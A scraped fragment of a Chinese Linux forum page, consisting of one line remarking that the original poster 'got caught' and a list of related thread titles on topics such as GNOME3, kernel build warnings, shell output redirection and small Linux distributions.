结果lz就中招了。
相关阅读
polipo logLevel 不管用?ioctl32 unknown cmd 错误怎么回事?linux问题inkscape 0.48 如果 start freeze(半原创) [咆啸体] gnome3 实在是伤不起啊send() vs sendto() (转载)md升级了,但是被你们吓的不敢重起阿GNOME3终于发布了推荐一个飞信的协议section mismatches while making kernelxp里面有没有像mail-notification一样的软件?ubuntu下的邮件服务器怎么做?python question命令后面加“> ./mylogfile.$$ 2>&1”这一串是什么意思呢?请教term得改啥设置能让man显示正常谁对container比较熟啊?After Ubuntu, Windows Looks Increasingly Bad, Increasingly Archaic, Increasingly Unfriendlyvirtualization and CPU designhow can I omit "./"请问有没有一两百k左右的linux系统?